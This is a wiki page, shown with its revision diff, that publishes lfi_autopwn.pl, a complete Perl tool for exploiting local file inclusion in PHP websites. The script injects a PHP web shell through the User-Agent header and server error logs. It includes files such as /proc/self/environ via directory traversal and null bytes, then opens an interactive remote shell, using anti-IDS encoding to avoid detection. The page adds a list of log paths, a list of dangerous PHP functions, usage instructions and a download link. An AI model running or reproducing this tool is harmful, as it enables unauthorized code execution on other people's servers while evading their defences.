Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "Lfi autopwn.pl"
From NetSec
(→httpdlogs.conf) |
|||
| (19 intermediate revisions by 7 users not shown) | |||
| Line 1: | Line 1: | ||
| − | + | {{info|This [[Perl|perl]] script requires '''LibWhisker2''' (bundled with '''nikto''') for [[IDS Evasion]] and exploits [[File inclusion|local file inclusion]], a form of [[Web Exploitation|web exploitation]]. All other libraries are standard.}} | |
| − | {{info|This script requires '''LibWhisker2''' (bundled with '''nikto'''). All other libraries are standard.}} | + | <font size="-2">Special thanks to [[User:hatter|hatter]] for his contributions to this article.</font> |
| − | + | ||
==Description== | ==Description== | ||
| − | This script will attempt to gain code execution on sites vulnerable to local [[File inclusion|file inclusion]] via an httpd error log or by modifying the user-agent and including a file containing environment variables. The [[PHP|php]] code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides IDS Evasion.{{notice|It is possible that this script will not work on your intended target but tests positive for php execution. In that case, changing your bash command execution function from system to one of many others is most likely to yield the desired results.}} | + | ===Features=== |
| + | * Signature-free | ||
| + | * Session Splicing | ||
| + | * User-Agent and Log injection | ||
| + | * Arithmetic Test | ||
| + | |||
| + | ===Usage=== | ||
| + | perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page | ||
| + | |||
| + | This script will attempt to gain code execution on sites vulnerable to local [[File inclusion|file inclusion]] via an httpd error log or by modifying the user-agent and including a file containing environment variables. The [[PHP|php]] code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides [[IDS Evasion]].{{notice|It is possible that this script will not work on your intended target but tests positive for php execution. In that case, changing your bash command execution function from system to one of many others is most likely to yield the desired results.}}{{protip|Make sure you've saved '''httpdlogs.conf''' to the same directory as '''lfi_autopwn.pl'''.}} | ||
===httpdlogs.conf=== | ===httpdlogs.conf=== | ||
| Line 218: | Line 226: | ||
return $int; | return $int; | ||
}</source>}} | }</source>}} | ||
| + | |||
| + | = Download = | ||
| + | |||
| + | * '''Download URL''': http://www.blackhatlibrary.net/releases/lfi_autopwn.tgz | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
| + | {{InHouse}} | ||
| + | |||
| + | {{exploitation}} | ||
| + | {{social}} | ||
| + | [[Category:Web exploitation]] | ||
Latest revision as of 08:34, 21 April 2013
|
This perl script requires LibWhisker2 (bundled with nikto) for IDS Evasion and exploits local file inclusion, a form of web exploitation. All other libraries are standard. |
Special thanks to hatter for his contributions to this article.
Contents
Description
Features
- Signature-free
- Session Splicing
- User-Agent and Log injection
- Arithmetic Test
Usage
perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i pageThis script will attempt to gain code execution on sites vulnerable to local file inclusion via an httpd error log or by modifying the user-agent and including a file containing environment variables. The php code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides IDS Evasion.
Notice: It is possible that this script will not work on your intended target but tests positive for php execution. In that case, changing your bash command execution function from system to one of many others is most likely to yield the desired results.
Protip: Make sure you've saved httpdlogs.conf to the same directory as lfi_autopwn.pl.
httpdlogs.conf
|
|
The httpdlogs.conf file dictates filenames for possible error log locations. |
- ./err.log
- ./error_log
- ./error.log
- /etc/httpd/conf/logs/error_log
- /etc/httpd/logs/error_log
- /home/php5/logs/error_log
- ../log/error_log
- ../log/error.log
- ../logs/error_log
- ../logs/error.log
- /proc/self/fd/2
- /usr/local/apache2/log/error_log
- /usr/local/apache2/logs/error_log
- /usr/local/apache2/logs/error.log
- /usr/local/apache/error.log
- /usr/local/apache/log/error_log
- /usr/local/apache/logs/error_log
- /usr/local/apachessl/logs/dummy-host.example.com-error_log
- /usr/local/apachessl/logs/error_log
- /usr/local/httpd/log/error_log
- /usr/local/httpd/logs/error_log
- /usr/local/php/log/error_log
- /var/log/apache2/error_log
- /var/log/apache2/error.log
- /var/log/apache/error_log
- /var/log/httpd-error.log
- /var/log/httpd/error_log
- /var/log/nginx/error.log
- /var/log/php-fcgi/error_log
- /var/log/php-fpm/err.log
Other Execution/Interesting PHP Functions
|
passthru, leak, link, shell_exec, exec, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo => php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo |
Source
|
The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act. |
#!/usr/bin/perl use strict; use Term::ANSIColor; use Getopt::Std; use LW2; my %opts = (); getopts('h:u:i:', \%opts); usage() unless($opts{u}); usage() unless($opts{h}); usage() unless($opts{i}); my $input = $opts{i}; my $url = $opts{u}; my $host = $opts{h}; my $var1 = generate_random_int(); my $var2 = generate_random_int(); my $total = $var1 + $var2; my $open = generate_random_string(4); my $close = generate_random_string(8); my $beginning = generate_random_string(6); my $ending = generate_random_string(4); my $shell = '<?php echo("'.$beginning.'"); system($_GET[\'cmd\']); echo("'.$ending.'"); ?>'; my $sled = "../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../.."; my @logs = `cat httpdlogs.conf`; my $test = '<?php $var = ' . $var1 . ' + ' . $var2 . '; echo("' . $open . '"); echo($var); echo("' . $close . '"); ?>'; # Test for /proc/self/environ && user_agent injection. my $file = "/proc/self/environ"; test_matches($url,$test,$shell,$file); my $lol_error = download($test,$host,"wget/mozilla"); my $lol_shelled = download($shell,$host,"wget/Mozilla"); foreach my $log (@logs) { chomp($log); test_matches($url,"wget/mozilla","wget/mozilla",$log); } sub test_matches { my $url = shift; my $test = shift; my $win = shift; my $file = shift; test_match($url,$test,$win,$file); test_match($url,$test,$win,"$sled$file"); test_match($url,$test,$win,"$file%00"); test_match($url,$test,$win,"$sled$file%00"); } sub test_match { my $urn = shift; my $use = shift; my $win = shift; my $match = shift; $urn =~ s/$input=[^\&\?\;]+/$input=$match/g; my ($l1,$l2,$l0) = test_rxe(download($urn,$host,$use)); if ($l0 gt 0) { print color 'bold blue'; print "\r["; print color 'reset'; print "INFO"; print color 'bold blue'; print "] "; print color 'red'; print "Successful code execution on $urn\nSpawning shell...\n"; print color 'reset'; spawn_shell($urn,$win); } } sub spawn_shell { my $urk = shift; my $use = shift; my $username = parse_rxe(download($urk . "&cmd=whoami",$host,$use),$beginning,$ending); my $hostname = parse_rxe(download($urk . "&cmd=hostname",$host,$use),$beginning,$ending); chomp($username); chomp($hostname); while (1) { print color 'bold green'; print "$username\@$hostname"; print color 'bold blue'; print " \$ "; print color 'reset'; my $input = <>; $input =~ s/\ /%20/g; chomp($input); print parse_rxe(download($urk . "&cmd=$input",$host,$use),$beginning,$ending); } } sub parse_rxe { my $output = shift; my $begin = shift; my $end = shift; my $mangler = generate_random_string(10); $output =~ s/\n/$mangler/g; $output =~ /$begin(.+)$end/g; my $ret = $1; $ret =~ s/$mangler/\n/g; return($ret); } sub test_rxe { my $output = shift; if ($output =~ /$open(.*)$close/g) { my $test_data = $1; if ($test_data =~ /(.*)$total(.*)/g) { my $preslack = $1; my $postslack = $2; return($preslack,$postslack,1); } } return (0,0,0); } sub download { my $uri = shift; my $try = 5; my $host = shift; my $ua = shift; my %request; my %response; LW2::http_init_request(\%request); $request{'whisker'}->{'method'} = "GET"; $request{'whisker'}->{'host'} = $host; $request{'whisker'}->{'uri'} = $uri; $request{'whisker'}->{'encode_anti_ids'} = 9; $request{'User-Agent'} = $ua; LW2::http_fixup_request(\%request); if(LW2::http_do_request(\%request, \%response)) { if($try < 5) { print "Failed to fetch $uri on try $try. Retrying...\n"; return undef if(!download($uri, $try++)); } print "Failed to fetch $uri.\n"; return undef; } else { return ($response{'whisker'}->{'data'}); } } sub generate_random_string($) { my $len = shift(@_); my @chars=('a'..'z','A'..'Z','0'..'9','_'); my $string; for(my $i = 0; $i < $len; $i++) { $string.=$chars[rand(@chars)]; } return $string; } sub usage() { print "perl lfi_autopwn.pl -h [host] -i [vuln input] -u [uri]\n"; exit(1); } sub generate_random_int() { my $int = int(rand(500 - 100 + 1)) + 100; return $int; } |
Download
- Download URL: http://www.blackhatlibrary.net/releases/lfi_autopwn.tgz
|
|
|
